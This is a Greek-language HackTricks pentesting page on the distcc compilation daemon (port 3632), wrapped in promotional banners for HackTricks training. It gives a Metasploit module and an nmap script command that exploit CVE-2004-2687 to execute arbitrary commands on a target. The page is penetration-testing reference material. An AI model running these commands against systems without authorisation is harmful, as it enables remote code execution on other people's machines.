3.8 KiB
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Basic Information
Distcc είναι ένα εργαλείο που ενισχύει τη διαδικασία μεταγλώττισης χρησιμοποιώντας τη ανενεργή υπολογιστική ισχύ άλλων υπολογιστών στο δίκτυο. Όταν το distcc είναι ρυθμισμένο σε μια μηχανή, αυτή η μηχανή είναι ικανή να διανέμει τις εργασίες μεταγλώττισης σε ένα άλλο σύστημα. Αυτό το σύστημα παραλήπτης πρέπει να εκτελεί τον distccd daemon και να έχει εγκατεστημένο έναν συμβατό μεταγλωττιστή για να επεξεργαστεί τον αποσταλμένο κώδικα.
Default port: 3632
PORT STATE SERVICE
3632/tcp open distccd
Εκμετάλλευση
Ελέγξτε αν είναι ευάλωτο σε CVE-2004-2687 για να εκτελέσετε αυθαίρετο κώδικα:
msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"
Shodan
Δεν νομίζω ότι το shodan ανιχνεύει αυτή την υπηρεσία.
Resources
- https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec
- https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855
Post created by Álex B (@r1p)
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.